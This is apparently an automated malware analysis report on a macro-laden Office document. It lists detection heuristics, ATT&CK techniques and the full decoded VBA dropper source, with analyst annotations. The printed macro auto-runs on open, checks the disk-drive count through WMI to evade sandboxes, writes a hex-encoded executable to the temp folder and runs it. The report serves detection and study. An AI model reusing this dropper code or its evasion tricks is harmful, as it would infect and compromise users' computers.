Verdict: MALICIOUS
Risk score: 390

Malware Insights

MITRE ATT&CK:
- T1566.001 Spearphishing Attachment
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The document body presents a lure to enable content, claiming the document is RSA encrypted. The VBA macro creates a WScript.Shell object via CreateObject and uses it to interact with the environment, likely to download and execute a second-stage payload. The presence of the WScript.Shell and CreateObject calls strongly suggests malicious intent.
Heuristics (12)

- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `Set sixtieth = VBA.CreateObject("WScript.Shell")`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set sixtieth = VBA.CreateObject("WScript.Shell")`
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: `Set charlatan = GetObject(hypocritical & ".\root\cimv2")`
- CallByName call (high, OLE_VBA_CALLBYNAME). Matched line in script: `binghamton = CallByName(sixtieth, rant, VbMethod, "%temp%")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Public Sub AutoOpen()`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/exif/1.0/
  - http://ns.adobe.com/tiff/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/rights/
  - http://www.iec.ch
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4266 bytes | c292d1e82e67439b0fd768ceaab166689ba1ec750346918496e481c217b30b92 |
Script preview (first 1,000 lines of the extracted script). Lines beginning with `' Analyst note` are annotations added to this report and are not part of the extracted macro:

```vb
Attribute VB_Name = "Document"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub FormatTablesSelect()
Dim oTb As Table
For Each oTb In ActiveDocument.Tables
Select Case oTb.Style
Case "Light Shading - Accent 4"
oTb.AutoFitBehavior (wdAutoFitFixed)
oTb.Rows.Alignment = wdAlignRowCenter
oTb.Columns.PreferredWidth = InchesToPoints(0.6)
Case "Medium List 2 - Accent 4"
oTb.AutoFitBehavior (wdAutoFitWindow)
oTb.Rows.Alignment = wdAlignRowLeft
Case "Table Grid", "Table Normal"
oTb.Style = "Light Grid - Accent 4"
Case Else
oTb.Style = "Medium List 1 - Accent 4"
End Select
Next oTb
End Sub
' Analyst note (added, not in the sample): irena.pipefish returns the number of Win32_DiskDrive
' instances reported by WMI (see below). 84 - 29 + 26424 = 26479 is never matched, so the Else
' branch runs and calls irena.hagridden, the dropper routine; FormatTablesSelect is decoy code.
Public Sub AutoOpen()
Dim topmast As String
Dim mignonette As Integer
Dim canny As Long
mignonette = irena.pipefish
If mignonette = 84 - 29 + 26424 Then
FormatTablesSelect
Else
caprice = 84 - 75
odds = 62 - 28 + 30
For caprice = 84 - 75 To 62 - 28 + 30
person = Right("eisenhowerda", 2) + "rn"
Next caprice
irena.hagridden
End If
End Sub
Attribute VB_Name = "irena"
Sub hagridden()
Dim mosslike As Integer
tableland = "nike"
Dim binghamton As String
Dim interferon As Long
Dim disagreeing As String
bushes = 69 - 16
unmusically = 79 + 109 - 94
If bushes + unmusically > 89 Then
bialy = "am" + "oral" + "ism"
End If
' Analyst note (added): rant evaluates to "EXPANDENVIRonmentstrings"; CallByName dispatches
' case-insensitively, so this is WScript.Shell.ExpandEnvironmentStrings("%temp%").
Set sixtieth = VBA.CreateObject("WScript.Shell")
rant = UCase("ExpandEnvir") + LCase("onmentStrings")
binghamton = CallByName(sixtieth, rant, VbMethod, "%temp%")
Dim gluon As Integer
disagreeing = binghamton & "\amnestic.exe"
Dim zombi As String
Dim halfbeak
Dim benzene
benzene = FreeFile
Dim confusing
confusing = 0
Dim glossopsitta
Dim carload As String
halfbeak = confusing
audacious = Deep.Depression
Dim drynaria As Long
agape = audacious
maleficent = Len(agape)
halfbeak = 1
Dim frisian As String
' Analyst note (added): agape holds the string read from Deep.Depression (a control on the "Deep"
' UserForm, whose contents are not in this preview). margin() writes it out two hex characters at
' a time, so %temp%\amnestic.exe receives the hex-decoded payload.
Open disagreeing For Binary Access Write As #benzene
Dim bounteousness As Byte
sarsaparilla = 1 + 39 - 8
cabined = 28 - 3 + 33
For sarsaparilla = 1 + 39 - 8 To 28 - 3 + 33
advoutry = "ha" + "emulon"
Next sarsaparilla
ascendancy = 1 - 54 + 55
For gunwale = halfbeak To (maleficent / ascendancy)
Call irena.margin(benzene, agape, halfbeak)
halfbeak = halfbeak + 2
Next gunwale
necessary = 118 - 96
amerind = 83 + 104 - 113
For necessary = 118 - 96 To 83 + 104 - 113
bicephalous = Right("communicationalcl", 2) + Right("spoilerothe", 4) + "s"
Next necessary
Close #benzene
' Analyst note (added): WScript.Shell.Run on the dropped executable.
binghamton = CallByName(sixtieth, "Run", VbMethod, disagreeing)
End Sub
' Analyst note (added): Chr(125 - 53) is "H", so each Put writes CByte("&H" & <two hex digits>).
Public Sub margin(ByRef hanaper, deformity, buoyantly)
frau = VBA.Mid(deformity, buoyantly, 2)
Put #hanaper, , CByte("&" + Chr(125 - 53) & frau)
End Sub
Function pipefish()
Dim voluptuary As Object
hiation = Left("Seasperges", 2) + LCase("lEct")
Dim arthritic As Long
monocot = 33 + 50 - 83
betrothed = 105 - 44
encomium = 119 + 94 - 118
If betrothed + encomium > 53 Then
mixtura = UCase("Jel") + "lyfis" + LCase("H")
End If
africanamerican = UCase(" * F") + StrReverse("_23niW mor")
Dim meatless As Long
objectionable = Left("Discato'ninetails", 3) + "kDriv" + StrReverse("e") + ""
hypocritical = UCase("Win") + Left("mgmtsholometabolic", 5) + ":\\" + ""
' Analyst note (added): the moniker is "WINmgmts:\\.\root\cimv2" and the query below evaluates
' to "Select * From Win32_DiskDrive"; the loop adds 1 per result, so pipefish = disk drive count.
Set charlatan = GetObject(hypocritical & ".\root\cimv2")
dessertspoon = 7 - 33 + 93
academicianship = 39 + 19
If dessertspoon + academicianship > 95 Then
carthorse = StrReverse("ua") + Right("chilledctio", 4) + "n"
End If
Set israel = charlatan.ExecQuery(hiation + africanamerican & objectionable)
For Each calculable In israel
monocot = monocot + 65 - 5 - 59
Next
pipefish = monocot
End Function
Attribute VB_Name = "Deep"
Attribute VB_Base = "0{ADBEA1FE-674E-4B08-8C5E-5BA54F7638AD}{D6D79688-B5A3-40CB-AD62-40212B48FD10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
End Sub
```